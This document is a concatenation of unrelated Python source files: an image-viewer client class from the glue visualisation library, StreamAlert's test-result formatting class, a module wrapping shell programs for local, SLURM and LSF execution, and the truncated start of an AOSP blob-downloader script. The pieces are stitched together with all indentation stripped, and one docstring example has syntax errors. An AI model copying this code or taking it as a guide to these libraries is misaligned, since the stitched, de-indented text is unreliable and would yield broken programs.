if value == tuple():
return
relim = value.index('x') != self._slice.index('x') or \
value.index('y') != self._slice.index('y')
self._slice = tuple(value)
self._clear_override()
self._update_axis_labels()
self._update_data_plot(relim=relim)
self._update_subset_plots()
self._update_scatter_plots()
self._redraw()
@property
def is_3D(self):
"""
Returns True if the display data has 3 dimensions """
if not self.display_data:
return False
return len(self.display_data.shape) == 3
@property
def slice_ind(self):
"""
For 3D data, returns the pixel index of the current slice.
Otherwise, returns None
"""
if self.is_3D:
for s in self.slice:
if s not in ['x', 'y']:
return s
return None
@property
def image(self):
return self._image
@requires_data
def override_image(self, image):
"""Temporarily override the current slice view with another
image (i.e., an aggregate)
"""
self._override_image = image
for a in self.artists[self.display_data]:
if isinstance(a, ImageLayerBase):
a.override_image(image)
self._update_data_plot()
self._redraw()
def _clear_override(self):
self._override_image = None
for a in self.artists[self.display_data]:
if isinstance(a, ImageLayerBase):
a.clear_override()
@slice_ind.setter
@defer_draw
def slice_ind(self, value):
if self.is_3D:
slc = [s if s in ['x', 'y'] else value for s in self.slice]
self.slice = slc
self._update_data_plot()
self._update_subset_plots()
self._update_scatter_plots()
self._redraw()
else:
raise IndexError("Can only set slice_ind for 3D images")
def can_image_data(self, data):
return data.ndim > 1
def _ensure_data_present(self, data):
if data not in self.artists:
self.add_layer(data)
@defer_draw
def set_data(self, data, attribute=None):
if not self.can_image_data(data):
return
self._ensure_data_present(data)
self._slice = None
attribute = attribute or _default_component(data)
self.display_data = data
self.display_attribute = attribute
self._update_axis_labels()
self._update_data_plot(relim=True)
self._update_subset_plots()
self._update_scatter_plots()
self._redraw()
def set_attribute(self, attribute):
if not self.display_data or \
attribute not in self.display_data.component_ids():
raise IncompatibleAttribute(
"Attribute not in data's attributes: %s" % attribute)
if self.display_attribute is not None:
self._norm_cache[self.display_attribute] = self.get_norm()
self.display_attribute = attribute
if attribute in self._norm_cache:
self.set_norm(norm=self._norm_cache[attribute])
else:
self.clear_norm()
self._update_data_plot()
self._redraw()
def _redraw(self):
"""
Re-render the screen
"""
pass
@requires_data
@defer_draw
def set_norm(self, **kwargs):
for a in self.artists[self.display_data]:
a.set_norm(**kwargs)
self._update_data_plot()
self._redraw()
@requires_data
def clear_norm(self):
for a in self.artists[self.display_data]:
a.clear_norm()
@requires_data
def get_norm(self):
a = self.artists[self.display_data][0]
return a.norm
@requires_data
@defer_draw
def set_cmap(self, cmap):
for a in self.artists[self.display_data]:
a.cmap = cmap
a.redraw()
def _build_view(self):
att = self.display_attribute
shp = self.display_data.shape
x, y = np.s_[:], np.s_[:]
slc = list(self.slice)
slc[slc.index('x')] = x
slc[slc.index('y')] = y
return (att,) + tuple(slc)
@requires_data
def _numerical_data_changed(self, message):
data = message.sender
self._update_data_plot(force=True)
self._update_scatter_layer(data)
for s in data.subsets:
self._update_subset_single(s, force=True)
self._redraw()
@requires_data
def _update_data_plot(self, relim=False, force=False):
"""
Re-sync the main image and its subsets
"""
if relim:
self.relim()
view = self._build_view()
self._image = self.display_data[view]
transpose = self.slice.index('x') < self.slice.index('y')
self._view = view
for a in list(self.artists):
if (not isinstance(a, ScatterLayerBase)) and \
a.layer.data is not self.display_data:
self.artists.remove(a)
else:
a.update(view, transpose)
for a in self.artists[self.display_data]:
meth = a.update if not force else a.force_update
meth(view, transpose=transpose)
def _update_subset_single(self, s, redraw=False, force=False):
"""
Update the location and visual properties
of each point in a single subset
Parameters:
----------
s: A subset instance
The subset to refresh.
"""
logging.getLogger(__name__).debug("update subset single: %s", s)
if s not in self.artists:
return
self._update_scatter_layer(s)
if s.data is not self.display_data:
return
view = self._build_view()
transpose = self.slice.index('x') < self.slice.index('y')
for a in self.artists[s]:
meth = a.update if not force else a.force_update
meth(view, transpose)
if redraw:
self._redraw()
@property
def _slice_ori(self):
if not self.is_3D:
return None
for i, s in enumerate(self.slice):
if s not in ['x', 'y']:
return i
@requires_data
@defer_draw
def apply_roi(self, roi):
subset_state = RoiSubsetState()
xroi, yroi = roi.to_polygon()
x, y = self._get_plot_attributes()
subset_state.xatt = x
subset_state.yatt = y
subset_state.roi = PolygonalROI(xroi, yroi)
mode = EditSubsetMode()
mode.update(self.data, subset_state, focus_data=self.display_data)
def _remove_subset(self, message):
self.delete_layer(message.sender)
def delete_layer(self, layer):
if layer not in self.artists:
return
for a in self.artists.pop(layer):
a.clear()
if isinstance(layer, Data):
for subset in layer.subsets:
self.delete_layer(subset)
if layer is self.display_data:
if len(self.artists) > 0:
self.display_data = self.artists.layers[0].data
else:
self.display_data = None
self._redraw()
def _remove_data(self, message):
self.delete_layer(message.data)
for s in message.data.subsets:
self.delete_layer(s)
def init_layer(self, layer):
# only auto-add subsets if they are of the main image
if isinstance(layer, Subset) and layer.data is not self.display_data:
return
self.add_layer(layer)
def rgb_mode(self, enable=None):
""" Query whether RGB mode is enabled, or toggle RGB mode
:param enable: bool, or None
If True or False, explicitly enable/disable RGB mode.
If None, check if RGB mode is enabled
:rtype: LayerArtist or None
If RGB mode is enabled, returns an RGBImageLayerBase
If enable=False, return the new ImageLayerArtist
"""
# XXX need to better handle case where two RGBImageLayerArtists
# are created
if enable is None:
for a in self.artists:
if isinstance(a, RGBImageLayerBase):
return a
return None
result = None
layer = self.display_data
if enable:
layer = self.display_data
a = self._new_rgb_layer(layer)
if a is None:
return
a.r = a.g = a.b = self.display_attribute
with self.artists.ignore_empty():
self.artists.pop(layer)
self.artists.append(a)
result = a
else:
with self.artists.ignore_empty():
for artist in list(self.artists):
if isinstance(artist, RGBImageLayerBase):
self.artists.remove(artist)
result = self.add_layer(layer)
self._update_data_plot()
self._redraw()
return result
def add_layer(self, layer):
if layer in self.artists:
return self.artists[layer][0]
if layer.data not in self.data:
raise TypeError("Data not managed by client's data collection")
if not self.can_image_data(layer.data):
# if data is 1D, try to scatter plot
if len(layer.data.shape) == 1:
return self.add_scatter_layer(layer)
logging.getLogger(__name__).warning(
"Cannot visualize %s. Aborting", layer.label)
return
if isinstance(layer, Data):
result = self._new_image_layer(layer)
self.artists.append(result)
for s in layer.subsets:
self.add_layer(s)
self.set_data(layer)
elif isinstance(layer, Subset):
result = self._new_subset_image_layer(layer)
self.artists.append(result)
self._update_subset_single(layer)
else:
raise TypeError("Unrecognized layer type: %s" % type(layer))
return result
def add_scatter_layer(self, layer):
logging.getLogger(
__name__).debug('Adding scatter layer for %s' % layer)
if layer in self.artists:
logging.getLogger(__name__).debug('Layer already present')
return
result = self._new_scatter_layer(layer)
self.artists.append(result)
self._update_scatter_layer(layer)
return result
def _update_scatter_plots(self):
for layer in self.artists.layers:
self._update_scatter_layer(layer)
@requires_data
def _update_scatter_layer(self, layer, force=False):
if layer not in self.artists:
return
xatt, yatt = self._get_plot_attributes()
need_redraw = False
for a in self.artists[layer]:
if not isinstance(a, ScatterLayerBase):
continue
need_redraw = True
a.xatt = xatt
a.yatt = yatt
if self.is_3D:
zatt = self.display_data.get_pixel_component_id(
self._slice_ori)
subset = (
zatt > self.slice_ind) & (zatt <= self.slice_ind + 1)
a.emphasis = subset
else:
a.emphasis = None
a.update() if not force else a.force_update()
a.redraw()
if need_redraw:
self._redraw()
@requires_data
def _get_plot_attributes(self):
x, y = _slice_axis(self.display_data.shape, self.slice)
ids = self.display_data.pixel_component_ids
return ids[x], ids[y]
def _pixel_coords(self, x, y):
"""From a slice coordinate (x,y), return the full (possibly
>2D) numpy index into the full data
*Note*
The inputs to this function are the reverse of numpy convention
(horizontal axis first, then vertical)
*Returns*
Either (x,y) or (x,y,z)
"""
result = list(self.slice)
result[result.index('x')] = x
result[result.index('y')] = y
return result
def is_visible(self, layer):
return all(a.visible for a in self.artists[layer])
def set_visible(self, layer, state):
for a in self.artists[layer]:
a.visible = state
def set_slice_ori(self, ori):
if not self.is_3D:
raise IndexError("Can only set slice_ori for 3D images")
if ori == 0:
self.slice = (0, 'y', 'x')
elif ori == 1:
self.slice = ('y', 0, 'x')
elif ori == 2:
self.slice = ('y', 'x', 0)
else:
raise ValueError("Orientation must be 0, 1, or 2")
def restore_layers(self, layers, context):
""" Restore a list of glue-serialized layer dicts """
for layer in layers:
c = lookup_class(layer.pop('_type'))
props = dict((k, v if k == 'stretch' else context.object(v))
for k, v in layer.items())
l = props['layer']
if issubclass(c, ScatterLayerBase):
l = self.add_scatter_layer(l)
elif issubclass(c, RGBImageLayerBase):
r = props.pop('r')
g = props.pop('g')
b = props.pop('b')
self.display_data = l
self.display_attribute = r
l = self.rgb_mode(True)
l.r = r
l.g = g
l.b = b
elif issubclass(c, (ImageLayerBase, SubsetImageLayerBase)):
if isinstance(l, Data):
self.set_data(l)
l = self.add_layer(l)
else:
raise ValueError("Cannot restore layer of type %s" % l)
l.properties = props
def _on_component_replace(self, msg):
if self.display_attribute is msg.old:
self.display_attribute = msg.new
def register_to_hub(self, hub):
super(ImageClient, self).register_to_hub(hub)
hub.subscribe(self,
ComponentReplacedMessage,
self._on_component_replace)
# subclasses should override the following methods as appropriate
def _new_rgb_layer(self, layer):
"""
Construct and return an RGBImageLayerBase for the given layer
Parameters
----------
layer : Data or Subset instance
Which object to visualize
"""
raise NotImplementedError()
def _new_subset_image_layer(self, layer):
"""
Construct and return a SubsetImageLayerArtist for the given layer
Parameters
----------
layer : Data or Subset instance
Which object to visualize
"""
raise NotImplementedError()
def _new_image_layer(self, layer):
"""
Construct and return an ImageLayerArtist for the given layer
Parameters
----------
layer : Data or Subset instance
Which object to visualize
"""
raise NotImplementedError()
def _new_scatter_layer(self, layer):
"""
Construct and return a ScatterLayerArtist for the given layer
Parameters
----------
layer : Data or Subset instance
Which object to visualize
"""
raise NotImplementedError()
def _update_axis_labels(self):
"""
Sync the displays for labels on X/Y axes, because
the data or slice has changed
"""
raise NotImplementedError()
def relim(self):
"""
Reset view window to the default pan/zoom setting.
"""
pass
def show_crosshairs(self, x, y):
pass
def clear_crosshairs(self):
pass
class MplImageClient(ImageClient):
def __init__(self, data, figure=None, axes=None, artist_container=None):
super(MplImageClient, self).__init__(data, artist_container)
if axes is not None:
raise ValueError("ImageClient does not accept an axes")
self._setup_mpl(figure, axes)
# description of field of view and center of image
self._view_window = None
# artist for a crosshair
self._crosshairs = None
def _setup_mpl(self, figure, axes):
figure, axes = init_mpl(figure, axes, wcs=True)
self._axes = axes
self._axes.get_xaxis().set_ticks([])
self._axes.get_yaxis().set_ticks([])
self._figure = figure
# custom axes formatter
def format_coord(x, y):
data = self.display_data
if data is None:
# MPL default method
return type(self._axes).format_coord(self._axes, x, y)
info = self.point_details(x, y)
return ' '.join(info['labels'])
self._axes.format_coord = format_coord
self._cid = self._axes.figure.canvas.mpl_connect('button_release_event',
self.check_update)
if hasattr(self._axes.figure.canvas, 'homeButton'):
# test code doesn't always use Glue's custom FigureCanvas
self._axes.figure.canvas.homeButton.connect(self.check_update)
@property
def axes(self):
return self._axes
def check_update(self, *args):
"""
For the MPL client, see if the view window has changed enough
such that the images should be resampled
"""
logging.getLogger(__name__).debug("check update")
vw = _view_window(self._axes)
if vw != self._view_window:
logging.getLogger(__name__).debug("updating")
self._update_data_plot()
self._update_subset_plots()
self._redraw()
self._view_window = vw
@requires_data
def _update_axis_labels(self):
labels = _axis_labels(self.display_data, self.slice)
self._update_wcs_axes(self.display_data, self.slice)
self._axes.set_xlabel(labels[1])
self._axes.set_ylabel(labels[0])
@defer_draw
def _update_wcs_axes(self, data, slc):
wcs = getattr(data.coords, 'wcs', None)
if wcs is not None and hasattr(self.axes, 'reset_wcs'):
self.axes.reset_wcs(wcs, slices=slc[::-1])
def _redraw(self):
self._axes.figure.canvas.draw()
def relim(self):
shp = _2d_shape(self.display_data.shape, self.slice)
self._axes.set_xlim(0, shp[1])
self._axes.set_ylim(0, shp[0])
def _new_rgb_layer(self, layer):
v = self._view or self._build_view()
a = RGBImageLayerArtist(layer, self._axes, last_view=v)
return a
def _new_image_layer(self, layer):
return ImageLayerArtist(layer, self._axes)
def _new_subset_image_layer(self, layer):
return SubsetImageLayerArtist(layer, self._axes)
def _new_scatter_layer(self, layer):
return ScatterLayerArtist(layer, self._axes)
def _build_view(self):
att = self.display_attribute
shp = self.display_data.shape
shp_2d = _2d_shape(shp, self.slice)
v = extract_matched_slices(self._axes, shp_2d)
x = slice(v[0], v[1], v[2])
y = slice(v[3], v[4], v[5])
slc = list(self.slice)
slc[slc.index('x')] = x
slc[slc.index('y')] = y
return (att,) + tuple(slc)
def show_crosshairs(self, x, y):
if self._crosshairs is not None:
self._crosshairs.remove()
self._crosshairs, = self._axes.plot([x], [y], '+', ms=12,
mfc='none', mec='#d32d26',
mew=2, zorder=100)
self._redraw()
def clear_crosshairs(self):
if self._crosshairs is not None:
self._crosshairs.remove()
self._crosshairs = None
def _2d_shape(shape, slc):
"""Return the shape of the 2D slice through a 2 or 3D image
"""
# - numpy ordering here
return shape[slc.index('y')], shape[slc.index('x')]
def _slice_axis(shape, slc):
"""
Return a 2-tuple of which axes in a dataset lie along the
x and y axes of the image
:param shape: Shape of original data. tuple of ints
:param slc: Slice through the data, tuple of ints, 'x', and 'y'
"""
return slc.index('x'), slc.index('y')
def _axis_labels(data, slc):
shape = data.shape
names = [data.get_world_component_id(i).label
for i in range(len(shape))]
return names[slc.index('y')], names[slc.index('x')]
def _view_window(ax):
""" Return a tuple describing the view window of an axes object.
The contents should not be used directly, Rather, several
return values should be compared with == to determine if the
window has been panned/zoomed
"""
ext = (ax.transAxes.transform([(1, 1)]) - ax.transAxes.transform([(0, 0)]))[0]
xlim, ylim = ax.get_xlim(), ax.get_ylim()
result = xlim[0], ylim[0], xlim[1], ylim[1], ext[0], ext[1]
logging.getLogger(__name__).debug("view window: %s", result)
return result
def _default_component(data):
"""Choose a default ComponentID to display for data
Returns PRIMARY if present
"""
cid = data.find_component_id('PRIMARY')
if cid is not None:
return cid
return data.component_ids()[0]
| |
"""
Copyright 2017-present Airbnb, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import defaultdict
import textwrap
from streamalert.shared import rule
from streamalert.shared.logger import get_logger
from streamalert_cli.test.event import TestEvent
from streamalert_cli.test.format import format_green, format_red, format_underline
LOGGER = get_logger(__name__)
class TestResult(TestEvent):
"""TestResult contains information useful for tracking test results"""
_NONE_STRING = '<None>'
_PASS_STRING = format_green('Pass')
_FAIL_STRING = format_red('Fail')
_SIMPLE_TEMPLATE = '{header}:'
_PASS_TEMPLATE = '{header}: {pass}' # nosec
_ERROR_TEMPLATE = '{header}: {error}' # nosec
_DESCRIPTION_LINE = (
'''
Description: {description}'''
)
_CLASSIFICATION_STATUS_TEMPLATE = (
'''
Classification: {classification_status}
Classified Type: {classified_type}
Expected Type: {expected_type}'''
)
_RULES_STATUS_TEMPLATE = (
'''
Rules: {rules_status}
Triggered Rules: {triggered_rules}
Expected Rules: {expected_rules}'''
)
_DISABLED_RULES_TEMPLATE = (
'''
Disabled Rules: {disabled_rules}'''
)
_PUBLISHERS_STATUS_TEMPLATE = (
'''
Publishers: {publishers_status}
Errors:
{publisher_errors}'''
)
_CLASSIFY_ONLY = (
'''
Classify Only: True'''
)
_ALERTS_TEMPLATE = (
'''
Live Alerts:
Sent Alerts: {sent_alerts}
Failed Alerts: {failed_alerts}'''
)
_DEFAULT_INDENT = 4
def __init__(self, idx, test_event, verbose=False, with_rules=False):
super().__init__(test_event)
self._index = idx
self._with_rules = with_rules
self._verbose = verbose
self._classified_result = None
self._live_test_results = {}
self._publication_results = {}
self.alerts = []
def __bool__(self):
return bool(self._classified_result)
def __str__(self):
fmt = {
'header': 'Test #{idx:02d}'.format(idx=self._index + 1),
}
if self.error:
fmt['error'] = format_red('Error - {}'.format(self.error))
return self._ERROR_TEMPLATE.format(**fmt)
if self.passed and not self._verbose:
# Simply render "Test #XYZ: Pass" if the whole test case passed
fmt['pass'] = self._PASS_STRING
return self._PASS_TEMPLATE.format(**fmt)
# Otherwise, expand the entire test with verbose details
template = self._SIMPLE_TEMPLATE + '\n' + self._DESCRIPTION_LINE
fmt['description'] = self.description
# First, render classification
template += '\n' + self._CLASSIFICATION_STATUS_TEMPLATE
fmt['classification_status'] = (
self._PASS_STRING if self.classification_tests_passed else self._FAIL_STRING
)
fmt['expected_type'] = self.log
fmt['classified_type'] = (
self._classified_result.log_schema_type
if self._classified else format_red(
self._classified_result.log_schema_type
if self else self._NONE_STRING
)
)
# If it was classification-only, note it down
if self.classify_only:
template += self._CLASSIFY_ONLY
# Render the result of rules engine run
if self.rule_tests_were_run:
template += '\n' + self._RULES_STATUS_TEMPLATE
fmt['rules_status'] = (
self._PASS_STRING if self.rule_tests_passed else self._FAIL_STRING
)
fmt['triggered_rules'] = self._format_rules(
self._triggered_rules,
self.expected_rules
)
fmt['expected_rules'] = self._format_rules(
self.expected_rules,
self._triggered_rules
)
disabled = self._disabled_rules
if disabled:
template += self._DISABLED_RULES_TEMPLATE
fmt['disabled_rules'] = ', '.join(disabled)
# Render live test results
if self.has_live_tests:
template += self._ALERTS_TEMPLATE
fmt['sent_alerts'], fmt['failed_alerts'] = self._format_alert_results()
# Render any publisher errors
if self.publisher_tests_were_run:
template += '\n' + self._PUBLISHERS_STATUS_TEMPLATE
num_pass = 0
num_total = 0
for num_total, result in enumerate(self._publication_results, start=1):
num_pass += 1 if result['success'] else 0
fmt['publishers_status'] = (
format_green('{}/{} Passed'.format(num_pass, num_total))
if num_pass == num_total
else format_red('{}/{} Passed'.format(num_pass, num_total))
)
pad = ' ' * self._DEFAULT_INDENT * 3
fmt['publisher_errors'] = (
format_red('\n'.join([
'{}{}'.format(pad, error) for error in self.publisher_errors
]))
if self.publisher_errors
else '{}{}'.format(pad, self._NONE_STRING)
)
return textwrap.dedent(template.format(**fmt)).rstrip() + '\n'
__repr__ = __str__
@property
def index(self):
return self._index
@property
def _disabled_rules(self):
return sorted(set(self.trigger_rules).intersection(
rule.Rule.disabled_rules()
))
@property
def _triggered_rules(self):
return {alert.rule_name for alert in self.alerts}
@property
def _untriggered_rules(self):
return sorted(self.expected_rules.difference(self._triggered_rules))
@property
def expected_rules(self):
return set(self.trigger_rules) - rule.Rule.disabled_rules()
@property
def classified_log(self):
return self._classified_result
@property
def _unexpected_rules(self):
return sorted(self._triggered_rules.difference(self.expected_rules))
@property
def _classified(self):
return self and self._classified_result.log_schema_type == self.log
def _format_rules(self, items, compare_set):
if not items:
return self._NONE_STRING
all_rules = set(rule.Rule.rule_names())
result = []
for value in sorted(items):
if value not in all_rules:
value = '{} (does not exist)'.format(value)
result.append(format_red(value) if value not in compare_set else value)
return ', '.join(result)
def _format_alert_results(self):
failed = defaultdict(list)
success = defaultdict(list)
for rule_name in sorted(self._live_test_results):
result = self._live_test_results[rule_name]
for output, status in result.items():
if not status:
failed[rule_name].append(output)
else:
success[rule_name].append(output)
return self._alert_result_block(success), self._alert_result_block(failed, True)
def _alert_result_block(self, values, failed=False):
result_block = []
fmt = '{pad_char:<{pad}}{line}'
for rule_name in sorted(values):
result_block.append(
fmt.format(
pad_char=' ',
pad=self._DEFAULT_INDENT * 4,
line='Rule: {rule_name}'.format(rule_name=format_underline(rule_name))
)
)
result_block.extend(
fmt.format(
pad_char=' ',
pad=self._DEFAULT_INDENT * 5,
line=format_red(value) if failed else value
)
for value in values[rule_name]
)
return self._NONE_STRING if not result_block else '\n{}'.format('\n'.join(result_block))
@property
def rule_tests_were_run(self):
"""Returns True if this testcase ran Rules Engine tests"""
return not self.classify_only and self._with_rules
@property
def publisher_tests_were_run(self):
"""Returns True if this test ran Publisher tests for each output"""
return (
self.rule_tests_were_run
and not self.skip_publishers
and self._publication_results
)
@property
def classification_tests_passed(self):
"""Returns True if all classification tests passed"""
return self._classified
@property
def rule_tests_passed(self):
"""Returns True if all rules engine tests passed
Also returns False if the rules engine tests were not run
"""
return self.rule_tests_were_run and (self._triggered_rules == self.expected_rules)
@property
def has_live_tests(self):
"""Returns True if this testcase ran any live tests"""
return self._live_test_results
@property
def live_tests_passed(self):
"""Returns True if all live tests passed
Also returns False if live tests were not run
"""
if not self.has_live_tests:
return False
for result in self._live_test_results.values():
if not all(status for status in result.values()):
return False
return True
@property
def publisher_tests_passed(self):
"""Returns True if all publisher tests were passed
Also returns False if publisher tests were not run
"""
if not self.publisher_tests_were_run:
return False
for result in self._publication_results:
if not result['success']:
return False
return True
@property
def publisher_errors(self):
"""Returns an array of strings describing errors in the publisher tests
The strings take the form:
[output:descriptor]: (Error Type) Error message
"""
if not self.publisher_tests_were_run:
return []
return [
"{}: {}".format(
item['output_descriptor'],
"({}) {}".format(
type(item['error']).__name__,
item['error']
)
if 'error' in item
else item['failure']
)
for item
in self._publication_results
if not item['success']
]
@property
def count_publisher_tests_passed(self):
"""Returns number of publisher tests that failed"""
return sum(1 for _, result in self._publication_results.items() if result['success'])
@property
def count_publisher_tests_run(self):
"""Returns total number of publisher tests"""
return len(self._publication_results)
@property
def passed(self):
"""A test has passed if it meets the following criteria:
1) The log has classified as the correct type
2) If rules are being tested, all triggered rules match expected rules
3) If a live test is being performed, all alerts sent to outputs successfully
"""
if not self.classification_tests_passed:
return False
if self.rule_tests_were_run:
if not self.rule_tests_passed:
return False
if self.has_live_tests:
if not self.live_tests_passed:
return False
if self.publisher_tests_were_run:
if not self.publisher_tests_passed:
return False
return True
def set_classified_result(self, classified_result):
self._classified_result = classified_result[0] if classified_result else None
def set_publication_results(self, publication_results):
"""
Params
publication_results (list[dict]):
A list of dictionaries that describe the result of running publications tests.
Each dictionary should contain the following:
- output_descriptor: The output the test is run on
- expectation: String describing the test: (e.g. "[$.slack] should be value")
- error: If an ERROR was encountered, this is the error
- failure: If the test did not pass, describe why
- success: True if test passed. False otherwise.
"""
self._publication_results = publication_results
def add_live_test_result(self, rule_name, result):
self._live_test_results[rule_name] = result
| |
"""
================
Warping programs
================
The ``@command`` decorator makes binding command line executables
easy to write and easy to use.
To wrap a program, write a function that takes whatever arguments
you will need to run the program like if it where on the shell.
The function should return a dictionary containing several keys:
* mandatory: ``arguments``
* optional: ``stdin``
* optional: ``return_value``.
Firstly, ``arguments`` should be a list of strings which is
the actual command and arguments to be executed (e.g. ``["touch", filename]``).
Secondly, ``stdin`` should be a value to feed the subprocess once it is launched.
Thirdly, ``return_value`` should be a value to return, or a callable
object which takes ``(stdout,strerr)`` as parameters and returns the value
that will be passed back to the user when this program is run.
You can also simply specify ``"stdout"`` to have the output of the
process returned directly.
For example, to wrap ``touch``, we write a one argument function that
takes the filename of the file to touch, and apply the ``@command``
decorator to it::
from plumbing.common import command
@command
def touch(filename):
return {"arguments": ["touch", filename],
"return_value": filename}
We can now call this function directly::
f = touch("myfile")
The value returned by touch is ``"myfile"``, the name of
the touched file.
A more complicated example would include binding the BLASTP algorithm::
from plumbing.common import command
@command
def blastp(database, sequences, **kwargs):
\"\"\"Will launch the 'blastp' algorithm using the NCBI executable.
:param database: The path to the database to blast against.
:param sequences: A fasta formated string.
:param **kwargs: Extra parameters that will be passed to the executable
For instance, you could specify "e=1e-20".
:returns: A list of top hits in blast format.
\"\"\"
return {"arguments": ["blastall", "-p", "blastp", "-d" database] +
[a for k,v in kwargs.items() for a in ('-'+k,v)],
"stdin": sequences)
"return_value": 'stdout'}
As shown above, we can now call this function directly::
hits = blastp("swissprot", open("proteins.fasta").read())
The value returned by blastp is a long string containing all the
results from the BLASTP algorithm.
Often you want to call a function, but not block when it returns
so you can run several in parallel. ``@command`` also creates a
method ``parallel`` which does this. The return value is a
Future object with a single method: ``wait()``. When you call
``wait()``, it blocks until the program finishes, then returns the
same value that you would get from calling the function directly.
So, to touch two files, and not block until both commands have
started, you would write::
a = blastp.parallel("nr", open("fasta1").read(), e=1e-20)
b = blastp.parallel("nr", open("fasta2").read(), e=1e-20)
hitsA = a.wait()
hitsB = b.wait()
The ``parallel`` method will runs processes without blocking.
Other methods exists for running commands in parallel.
For example, on systems using the SLURM batch submission
system, you can run commands via batch submission by using the
``slurm`` method and optionally adding the time and account info::
p = blastp.slurm("nr", open("fasta").read(), time='1:00:00')
hits = p.wait()
On systems using the LSF batch submission system, you can run
commands via batch submission by using the ``lsf`` method::
p = blastp.lsf("nr", open("fasta").read(), queue='long')
hits = p.wait()
"""
# Built-in modules #
import subprocess, sys, time
# Variables #
PARRALEL_JOBS = []
################################################################################
def start_process(args):
"""Run a process using subprocess module"""
try:
return subprocess.Popen(args, bufsize=-1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
except OSError:
raise ValueError("Program '%s' does not seem to exist in your $PATH." % args[0])
################################################################################
def pause_for_parallel_jobs(update_interval=2):
"""Wait until all parallel jobs are done and print a status update"""
global PARRALEL_JOBS
while True:
PARRALEL_JOBS = [job for job in PARRALEL_JOBS if not job.finished]
if not PARRALEL_JOBS:
sys.stdout.write("\r\033[K")
sys.stdout.flush()
return
sys.stdout.write("\r %i parallel jobs still running.\033[K" % len(PARRALEL_JOBS))
sys.stdout.flush()
time.sleep(update_interval)
################################################################################
class CommandFailed(Exception):
"""Thrown when a program bound by ``@command``
exits with a value other than ``0``."""
def __init__(self, args, stderr, name=None):
message = "Running '%s' failed." % " ".join(args)
if name: message += " The job name was: '%s'." % name
if stderr: message += " The error reported is:\n\n" + stderr
Exception.__init__(self, message)
################################################################################
class command(object):
"""Decorator used to wrap external programs."""
def __init__(self, function):
self.function = function
self.__doc__ = function.__doc__
self.__name__ = function.__name__
def __call__(self, *args, **kwargs):
"""Run a program locally, and block until it completes."""
# Call the user defined function #
cmd_dict = self.function(*args, **kwargs)
cmd_dict['arguments'] = [str(a) for a in cmd_dict['arguments']]
args = cmd_dict['arguments']
# Start a process #
proc = start_process(args)
# Wait until completion #
try: stdout, stderr = proc.communicate(cmd_dict.get("stdin"))
except KeyboardInterrupt as err:
print "You aborted the process pid %i. It was: %s " % (proc.pid, args)
raise err
# Check for failure #
if proc.returncode != 0: raise CommandFailed(args, stderr)
# Return result #
result = cmd_dict.get("return_value")
if callable(result): return result(stdout, stderr)
elif result == 'stdout': return stdout
else: return result
def parallel(self, *args, **kwargs):
"""Run a program and return a Future object."""
# Call the user defined function #
cmd_dict = self.function(*args, **kwargs)
cmd_dict['arguments'] = [str(a) for a in cmd_dict['arguments']]
# Start a process #
proc = start_process(cmd_dict['arguments'])
# Write to the standard in #
if 'stdin' in cmd_dict:
proc.stdin.write(cmd_dict["stdin"])
proc.stdin.close()
# The Future object takes it from here #
future = Future(proc, cmd_dict)
# Let's keep a reference of it #
PARRALEL_JOBS.append(future)
# Hand it back to the user #
return future
def slurm(self, *args, **kwargs):
"""Run a program via the SLURM system and return a Future object."""
# Optional name #
name = kwargs.get('name')
# Define special parameters #
special_params = (('time','-t'), ('account','-A'), ('name','-J'))
# Compose the command #
slurm_cmd = ['srun', '-n', '1', '-Q']
# Get optional parameters #
for param,key in special_params:
if param in kwargs: slurm_cmd += [key, kwargs.pop(param)]
# Call the user defined function #
cmd_dict = self.function(*args, **kwargs)
cmd_dict['arguments'] = [str(a) for a in cmd_dict['arguments']]
# Get optional keyword parameters #
qos = kwargs.pop('qos') if 'qos' in kwargs else None
if qos: slurm_cmd += ['--qos='+qos]
# Update the command #
cmd_dict["arguments"] = slurm_cmd + cmd_dict["arguments"]
# Start a process #
proc = start_process(cmd_dict['arguments'])
# Write the standard in #
if 'stdin' in cmd_dict:
proc.stdin.write(cmd_dict["stdin"])
proc.stdin.close()
# The Future object takes it from here #
future = Future(proc, cmd_dict, name)
# Let's keep a reference of it #
PARRALEL_JOBS.append(future)
# Hand it back to the user #
return future
def lsf(self, *args, **kwargs):
"""Run a program via the LSF system and return a Future object."""
# Optional name #
name = kwargs.get('name')
# Get extra optional keyword parameters #
queue = kwargs.pop('queue') if 'queue' in kwargs else None
# Call the user defined function #
cmd_dict = self.function(*args, **kwargs)
cmd_dict['arguments'] = [str(a) for a in cmd_dict['arguments']]
# Compose the command #
bsub_cmd = ["bsub", "-o", "/dev/null", "-e", "/dev/null", "-K", "-r"]
if queue: bsub_cmd += ['-q', queue]
cmd_dict["arguments"] = bsub_cmd + cmd_dict["arguments"]
# Start a process #
proc = start_process(cmd_dict['arguments'])
# Write the standard in #
if 'stdin' in cmd_dict:
proc.stdin.write(cmd_dict["stdin"])
proc.stdin.close()
# The FutureLSF object takes it from here #
future = Future(proc, cmd_dict, name)
# Let's keep a reference of it #
PARRALEL_JOBS.append(future)
# Hand it back to the user #
return future
################################################################################
class Future(object):
"""Object returned when functions decorated with ``@command``
are executed in parallel with ``parallel()``."""
def __init__(self, proc, cmd_dict, name=None):
self.proc = proc
self.cmd_dict = cmd_dict
self.name = name
@property
def finished(self):
if self.proc.poll() is None: return False
else: return True
@property
def return_code(self):
return self.proc.poll()
def wait(self):
# Wait until completion #
try: return_code = self.proc.wait()
except KeyboardInterrupt as err:
print "You aborted the process pid %i. It was: %s " % (self.proc.pid, self.cmd_dict["arguments"])
raise err
# Read result #
stdout, stderr = self.proc.stdout.read(), self.proc.stderr.read()
# Check for failure #
if return_code != 0: raise CommandFailed(self.cmd_dict["arguments"], stderr, self.name)
# Return result #
result = self.cmd_dict.get("return_value")
if callable(result): return result(stdout, stderr)
elif result == 'stdout': return stdout
else: return result
| |
#!/usr/bin/python3
"""Manage downloading of AOSP blobs.
This script scrapes the contents of the Google web page that tracks
current versions of vendor blobs for AOSP images. It then downloads
the most recent blobs for the most common development devices
into a repository where they can be picked up later on and incorporated
into an AOSP client.
More detailed background info:
Android system images built from AOSP clients can't be flashed
